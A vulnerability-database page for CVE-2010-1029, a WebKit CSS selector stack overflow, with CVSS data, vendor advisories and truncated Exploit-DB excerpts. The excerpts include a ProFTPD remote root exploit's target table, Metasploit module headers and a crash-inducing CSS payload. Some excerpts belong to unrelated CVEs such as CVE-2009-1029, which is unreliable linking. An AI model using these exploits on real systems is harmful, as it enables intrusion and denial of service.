CVE-2010-1029
published 2010-03-19CVE-2010-1029: Stack consumption vulnerability in the WebCore::CSSSelector function in WebKit, as used in Apple Safari 4.0.4, Apple Safari on iPhone OS and iPhone OS for iPod…
PriorityP430medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
10.38%
95.2th percentile
Stack consumption vulnerability in the WebCore::CSSSelector function in WebKit, as used in Apple Safari 4.0.4, Apple Safari on iPhone OS and iPhone OS for iPod touch, and Google Chrome 4.0.249, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a STYLE element composed of a large number of *> sequences.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | safari | — | — |
| chrome | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-p27p-g844-ppm9: Stack consumption vulnerability in the WebCore::CSSSelector function in WebKit, as used in Apple Safari 4
ghsa_unreviewed·2022-04-23
CVE-2010-1029 [MEDIUM] GHSA-p27p-g844-ppm9: Stack consumption vulnerability in the WebCore::CSSSelector function in WebKit, as used in Apple Safari 4
Stack consumption vulnerability in the WebCore::CSSSelector function in WebKit, as used in Apple Safari 4.0.4, Apple Safari on iPhone OS and iPhone OS for iPod touch, and Google Chrome 4.0.249, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a STYLE element composed of a large number of *> sequences.
Red Hat
qt: Stack consumption via specially-crafted CSS STYLE element
vendor_redhat·2010-02-24·CVSS 5.0
CVE-2010-1029 [MEDIUM] qt: Stack consumption via specially-crafted CSS STYLE element
qt: Stack consumption via specially-crafted CSS STYLE element
Stack consumption vulnerability in the WebCore::CSSSelector function in WebKit, as used in Apple Safari 4.0.4, Apple Safari on iPhone OS and iPhone OS for iPod touch, and Google Chrome 4.0.249, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a STYLE element composed of a large number of *> sequences.
No detection rules found.
Exploit-DB
POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)
exploitdb·2010-11-30
CVE-2009-1029 POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)
POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)
---
##
# $Id: poppeeper_uidl.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'POP Peeper v3.4 UIDL Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in POP Peeper v3.4.
When a specially crafted UIDL string is sent to a client,
an attacker may be able to execute arbitrary code. This
module is based off of krakowlabs code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11180 $',
'References' =>
[
[ 'OSVDB', '53559
Exploit-DB
POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
exploitdb·2010-11-11
CVE-2009-1029 POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
---
##
# $Id: poppeeper_date.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'POP Peeper v3.4 DATE Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in POP Peeper v3.4.
When a specially crafted DATE string is sent to a client,
an attacker may be able to execute arbitrary code. This
module is based off of krakowlabs code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2009-10
Exploit-DB
ProFTPd IAC 1.3.x - Remote Command Execution
exploitdb·2010-11-07
CVE-2010-4221 ProFTPd IAC 1.3.x - Remote Command Execution
ProFTPd IAC 1.3.x - Remote Command Execution
---
# Exploit Title: ProFTPD IAC Remote Root Exploit
# Date: 7 November 2010
# Author: Kingcope
#
# E-DB Note: If you have issues with this exploit, alter lines 549, 555 and 563.
use IO::Socket;
$numtargets = 13;
@targets =
(
# Plain Stack Smashing
#Confirmed to work
["FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)",# PLATFORM SPEC
"FreeBSD", # OPERATING SYSTEM
0, # EXPLOIT STYLE
0xbfbfe000, # OFFSET START
0xbfbfff00, # OFFSET END
1029], # ALIGN
#Confirmed to work
["FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)",
"FreeBSD",
0,
0xbfbfe000,
0xbfbfff00,
1021],
# Return into Libc
#Confirmed to work
["Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1, # EXPLOIT STYLE
0x0804CCD4, # write(2) offset
8189,
Exploit-DB
iPhone - 'WebCore::CSSSelector()' Remote Crash
exploitdb·2010-02-24
CVE-2010-1029 iPhone - 'WebCore::CSSSelector()' Remote Crash
iPhone - 'WebCore::CSSSelector()' Remote Crash
---
#!/usr/bin/python
# ,
# dM
# MMr
# 4MMML .
# MMMMM. xf
# . "M6MMM .MM-
# Mh.. +MM5MMM .MMMM
# .MMM. .MMMMML. MMMMMh
# )MMMh. MM5MMM MMMMMMM
# 3MMMMx. 'MMM3MMf xnMMMMMM"
# '*MMMMM MMMMMM. nMMMMMMP"
# *MMMMMx "MMM5M\ .MMMMMMM=
# *MMMMMh "MMMMM" JMMMMMMP
# MMMMMM GMMMM. dMMMMMM .
# MMMMMM "MMMM .MMMMM( .nnMP"
# .. *MMMMx MMM" dMMMM" .nnMMMMM*
# "MMn... 'MMMMr 'MM MMM" .nMMMMMMM*"
# "4MMMMnn.. *MMM MM MMP" .dMMMMMMM""
# ^MMMMMMMMx. *ML "M .M* .MMMMMM**"
# *PMMMMMMhn. *x > M .MMMM**""
# ""**MMMMhx/.h/ .=*"
# .3P"%....
# [t12] nP" "*MMnx
# SMOKE WEED
#greetz to my blackhatz and baycatz
#iPhone CSS::Selector crash
#this Python script acts as a web server and sends a malformed long string to the CSS tag
#this is a remote crash bug, hoever an an
Exploit-DB
Apple Safari 4.0.4 / Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service (PoC)
exploitdb·2010-02-24
CVE-2010-1029 Apple Safari 4.0.4 / Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service (PoC)
Apple Safari 4.0.4 / Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service (PoC)
---
Apple Safari 4.0.4 & Google Chrome 4.0.249 CSS style Stack Overflow
DoS/PoC
Thank you
Rad L. Sneak
Apple Safari 4.0.4 & Google Chrome 4.0.249 CSS style Stack Overflow DoS/PoC
Tested on WinXP SP3 and Windows 7 64bit Also works on Apple iPhone Safari
Stack Overflow caused by long malformed string inside of
Code will cause Apple Safari to crash throwing a stack overflow
Chrome will through up the "Aw, Snap!"
Found by Rad L. Sneak using BF3
[email protected]
What's up Sliccc1....Where's my app
cheers to mithcebones
Save the code below into as crash.html and open in Safari 4.0.4 or later OR open with Google Chrome 4.0.249 or later
*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.htmlhttp://secunia.com/advisories/43068http://www.exploit-db.com/exploits/11567http://www.exploit-db.com/exploits/11574http://www.securityfocus.com/bid/38398http://www.vupen.com/english/advisories/2011/0212https://exchange.xforce.ibmcloud.com/vulnerabilities/56524https://exchange.xforce.ibmcloud.com/vulnerabilities/56527https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14301http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.htmlhttp://secunia.com/advisories/43068http://www.exploit-db.com/exploits/11567http://www.exploit-db.com/exploits/11574http://www.securityfocus.com/bid/38398http://www.vupen.com/english/advisories/2011/0212https://exchange.xforce.ibmcloud.com/vulnerabilities/56524https://exchange.xforce.ibmcloud.com/vulnerabilities/56527https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14301
2010-03-19
Published